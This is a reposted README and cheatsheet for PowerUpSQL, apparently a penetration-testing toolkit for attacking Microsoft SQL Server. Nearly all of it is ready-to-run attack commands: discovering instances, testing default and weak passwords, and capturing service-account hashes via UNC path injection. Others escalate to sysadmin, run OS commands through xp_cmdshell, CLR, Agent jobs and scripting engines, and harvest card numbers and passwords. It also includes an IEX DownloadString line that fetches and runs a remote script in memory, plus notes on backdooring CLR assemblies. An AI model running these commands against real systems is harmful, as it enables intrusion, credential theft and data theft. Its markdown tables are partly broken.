# PowerUpSQL PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server Link: Example: ``` PS /opt/PowerUpSQL> Import-Module .\PowerUpSQL.psd1 PS /opt/PowerUpSQL> Get-SQLInstanceDomain -Verbose VERBOSE: Grabbing SPNs from the domain for SQL Servers (MSSQL*)... VERBOSE: 0 SPNs found. VERBOSE: Parsing SQL Server instances from SPNs... VERBOSE: 0 instances were found. ``` Or load into memory ``` IEX(New-Object System.Net.WebClient).DownloadString("http://192.168.0.1/PowerUpSQL.ps1") ``` ## Commands: ### Find information on local server `PS C:>Get-SQLInstanceLocal | Get-SQLServerInfo` Test Connection to a server `Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose –Threads 1`0 `Search data in SQL instance:` ``` PS C:\> Get-SQLInstanceLocal | Get-SQLColumnSampleDataThreaded –Verbose –Threads 10 –Keyword “card, password” ComputerName Instance Database Schema Table Column Sample RowCount IsCC ------------ -------- -------- ------ ----- ------ ------ -------- ---- SQLServer1 SQLServer1\STANDARDDEV2014 testdb dbo tracking card 4111111111111111 2 True SQLServer1 SQLServer1\STANDARDDEV2014 testdb dbo tracking card 41111111111ASDFD 2 False ``` ## Cheatsheet ### SQL Server Discovery Cheats | Description | Command | | | ------------------------------------------------------------------------------------------ | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------- | | Discover Local SQL Server Instances | `Get-SQLInstanceLocal -Verbose` | | | Discover Remote SQL Server Instances |

UDP Broadcast Ping
Get-SQLInstanceBroadcast -Verbose

UDP Port Scan
Get-SQLInstanceScanUDPThreaded -Verbose -ComputerName SQLServer1

Get the instance list from a file
Get-SQLInstanceFile -FilePath c:\temp\computers.txt | Get-SQLInstanceScanUDPThreaded -Verbose

| | Discover Active Directory Domain SQL Server Instances | `Get-SQLInstanceDomain -Verbose` | | | Discover Active Directory Domain SQL Server Instances using alternative domain credentials |

runas /noprofile /netonly /user:domain\user PowerShell.exe
import-module PowerUpSQL.psd1
Get-SQLInstanceDomain -Verbose -DomainController 192.168.1.1 -Username domain\user -password P\@ssword123

| | | List SQL Servers using a specific domain account | `Get-SQLInstanceDomain -Verbose -DomainAccount SQLSvc` | | | List shared domain user SQL Server service accounts | `Get-SQLInstanceDomain -Verbose \| Group-Object DomainAccount \| Sort-Object count -Descending \| select Count,Name \| Where-Object {($_.name -notlike "*$") -and ($_.count -gt 1) }` | | ### SQL Server Authentication Cheats All PowerUpSQL functions support authenticating directly to a known SQL Server instance without having to perform discovery first. You can authenticate using the current domain user credentials or provide an SQL Server login. All PowerUpSQL functions will attempt to authenticate to the provided instance as the current domain user if the username/password parameters are not provided. This also applies if you're running PowerShell through runas /netonly. Below are some basic examples using the "Get-SQLQuery" function. | Description | Command Examples | | ------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | Authenticating to a known SQL Server instance as the current domain user. |

Current Domain User
Get-SQLQuery -Verbose -Instance "10.2.2.5,1433"

| | Authenticating to a known SQL Server instance using a SQL Server login. |

Server and Instance Name
Get-SQLQuery -Verbose -Instance "servername\instancename" -username testuser -password testpass

IP and Instance Name
Get-SQLQuery -Verbose -Instance "10.2.2.5\instancename" -username testuser -password testpass

IP and Port
Get-SQLQuery -Verbose -Instance "10.2.2.5,1433" -username testuser -password testpass

| ### SQL Server Login Test Cheats | Description | Command | | | | ---------------------------------------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------- | | Get a list of domain SQL servers that can be logged into with a provided SQL Server login |

$Targets = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 -username testuser -password testpass | Where-Object {$\_.Status -like "Accessible"}
$Targets

| | Get a list of domain SQL servers that can be logged into with the current domain account |

$Targets = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 | Where-Object {$\_.Status -like "Accessible"}
$Targets

| | Get a list of domain SQL servers that can be logged into using an alternative domain account |

runas /noprofile /netonly /user:domain\user PowerShell.exe
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose -Threads 15

| | | Get a list of domain SQL servers that can be logged into using an alternative domain account from a non domain system. |

runas /noprofile /netonly /user:domain\user PowerShell.exe
Get-SQLInstanceDomain -Verbose -Username 'domain\user' -Password 'MyPassword!' -DomainController 10.1.1.1 | Get-SQLConnectionTestThreaded -Verbose -Threads 15

| | | Discover domain SQL Servers and determine if they are configured with default passwords used by common applications based on the instance name | `Get-SQLInstanceDomain \| Get-SQLServerLoginDefaultPw -Verbose` | | | ### SQL Server Authenticated Information Gathering Cheats | Description | Command | | | ------------------------------------------------------------------------------------------------------------------------------------------------ | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | Get general server information such as SQL/OS versions, service accounts, sysdmin access etc. |

Get information from a single server
Get-SQLServerInfo -Verbose -Instance SQLServer1\Instance1

Get information from domain servers
$ServerInfo = Get-SQLInstanceDomain | Get-SQLServerInfoThreaded -Verbose -Threads 10
$ServerInfo

Note: Running this against domain systems can reveal where Domain Users have sysadmin privileges.

| | Get an inventory of common objects from the remote server including permissions, databases, tables, views etc, and dump them out into CSV files. | `Invoke-SQLDumpInfo -Verbose -Instance Server1\Instance1` | | ### SQL Server Privilege Escalation Cheats | Description | Command | | | | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | ------------------------------------------------------------------------------------- | ----------------------- | |

Domain User to SQL Service Account.
While running as a domain user this function will automatically do 4 things. 1. Identify SQL Servers on the domain via a LDAP query to a DC for SPNs. 2. Attempt to log into each. 3. Perform UNC path injection using various methods. 4. Attempt to capture the password hashes for the associated SQL Server service account.

| `Invoke-SQLUncPathInjection -Verbose -CaptureIp 10.1.1.12` | | | | OS admin to sysadmin via service account impersonation, then all PowerUpSQL commands can be run as a sysadmin. | `Invoke-SQLImpersonateService -Verbose -Instance MSSQLSRV04\BOSCHSQL` | | | | Audit for Issues | `Invoke-SQLAudit -Verbose -Instance SQLServer1` | | | | Escalate to sysadmin | `Invoke-SQLEscalatePriv -Verbose -Instance SQLServer1` | | | | Execute OS commands: xp\_cmdshell | `$Targets \| Invoke-SQLOSCmd -Verbose -Command "Whoami" -Threads 10` | | | | Execute OS commands: Custom xp |

Create-SQLFileXpDll -OutFile c:\temp\test.dll -Command "echo test > c:\temp\test.txt" -ExportName xp\_test -Verbose
Host the test.dll on a share readable by the SQL Server service account.
Get-SQLQuery -Verbose -Query "sp\_addextendedproc 'xp\_test', '\yourserver\yourshare\myxp.dll'"
xp\_test
sp\_dropextendedproc 'xp\_test'

| | | | Execute OS commands: CLR | `$Targets \| Invoke-SQLOSCLR -Verbose -Command "Whoami"` | | | | Execute OS commands: Ole Automation Procedures | `$Targets \| Invoke-SQLOSOle -Verbose -Command "Whoami"` | | | | Execute OS commands: External Scripting - R | `$Targets \| Invoke-SQLOSR -Verbose -Command "Whoami"` | | | | Execute OS commands: External Scripting - Python | `$Targets \| Invoke-SQLOSPython -Verbose -Command "Whoami"` | | | | Execute OS commands: Agent Job - CmdExec | `$Targets \| Invoke-SQLOSCmdAgentJob -Verbose -SubSystem CmdExec -Command "echo hello > c:\windows\temp\test1.txt"` | | | | Execute OS commands: Agent Job - PowerShell | `$Targets \| Invoke-SQLOSCmdAgentJob -Verbose -SubSystem PowerShell -Command 'write-output "hello world" \| out-file c:\windows\temp\test2.txt' -Sleep 20` | | | | Execute OS commands: Agent Job - VBScript | `$Targets \| Invoke-SQLOSCmdAgentJob -Verbose -SubSystem VBScript -Command 'c:\windows\system32\cmd.exe /c echo hello > c:\windows\temp\test3.txt'` | | | | Execute OS commands: Agent Job - JScript | `$Targets \| Invoke-SQLOSCmdAgentJob -Verbose -SubSystem JScript -Command 'c:\windows\system32\cmd.exe /c echo hello > c:\windows\temp\test3.txt'` | | | | Crawl database links | `Get-SqlServerLinkCrawl -Verbose -Instance SQLSERVER1\Instance1` | | | | Crawl database links and execute query |

Get-SqlServerLinkCrawl -Verbose -Instance SQLSERVER1\Instance1 -Query "select name from master..sysdatabases"
Blog:

| | | | Crawl database links and execute OS command | `Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "exec master..xp_cmdshell 'whoami'"` | | | | Dump contents of Agent jobs. Often contain passwords. Verbose output includes job summary data. |

$Results = Get-SQLAgentJob -Verbose -Instance Server1\Instance1 -Username sa -Password 'P\@ssword!'
or
$Results = Get-SQLInstanceDomain -Verbose | Get-SQLAgentJob -Verbose -Username sa -Password 'P\@ssword!'
$Results | Out-GridView

| | Enumerate all SQL Logins as least privilege user and test username as password. |

Run against single server
Invoke-SQLAuditWeakLoginPw -Verbose -Instance SQLServer1\Instance1
Run against domain SQL Servers
$WeakPasswords = Get-SQLInstanceDomain -Verbose | Invoke-SQLAuditWeakLoginPw -Verbose
$WeakPasswords

| | ### SQL Server Data Targeting Cheats | Description | Command | | ----------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | Dump an inventory of common objects to csv in the current directory. | `Invoke-SQLDumpInfo -Verbose -Instance server1\instance1` | | Execute arbitrary query | `$Targets \| Get-SQLQuery -Verbose -Query "Select @@version"` | | Grab basic server information | `$Targets \| Get-SQLServerInfoThreaded -Threads 10 -Verbose` | | Grab list of non-default databases | `$Targets \| Get-SQLDatabaseThreaded –Verbose –Threads 10 -NoDefaults` | | Dump common information from server to files | `Invoke-SQLDumpInfo -Verbose -Instance SQLSERVER1\Instance1 -csv` | | Find sensitive data based on column name | `$Targets \| Get-SQLColumnSampleDataThreaded –Verbose –Threads 10 –Keyword "credit,ssn,password" –SampleSize 2 –ValidateCC –NoDefaults` | | Find sensitive data based on column name, but only target databases with transparent encryption | `$Targets \| Get-SQLDatabaseThreaded –Verbose –Threads 10 -NoDefaults \| Where-Object {$_.is_encrypted –eq “TRUE”} \| Get-SQLColumnSampleDataThreaded –Verbose –Threads 10 –Keyword “card, password” –SampleSize 2 –ValidateCC -NoDefaults` | ### Miscellaneous Post Exploitation Cheats | Description | Command | | | | | ------------------------------------------------------------------------------------------------------------------------------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | ------------------------------------------------- | -------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | | Export all custom CLR assemblies to DLLs. They can be decompiled offline, and often contain passwords. Also, they can be backdoored without too much effort. |

$Results = Get-SQLStoredProcedureCLR -Verbose -Instance Server1\Instance1 -Username sa -Password 'P\@ssword!' -ExportFolder c:\temp
$Results | Out-GridView

| | | | Create a SQL command that can be used to import an existing (or backdoored) CLR assembly. |

Create-SQLFileCLRDll -Verbose -SourceDllPath c:\temp\evil.dll
Blog:

| | | | | Create a DLL and SQL command that can be used to import a CLR assembly to execute OS commands. | `Create-SQLFileCLRDll -Verbose -ProcedureName runcmd -OutDir c:\temp -OutFile evil` | | | | | Get a list of Shared SQL Server service accounts |

Get-SQLInstanceDomain -Verbose | Select-Object DomainAccount, ComputerName -Unique | Group-Object DomainAccount | Sort-Object Count -Descending

Note: Any count greater than 1 indicates a domain account used on multiple systems that could potentially be used for SMB Relay attacks.\`

|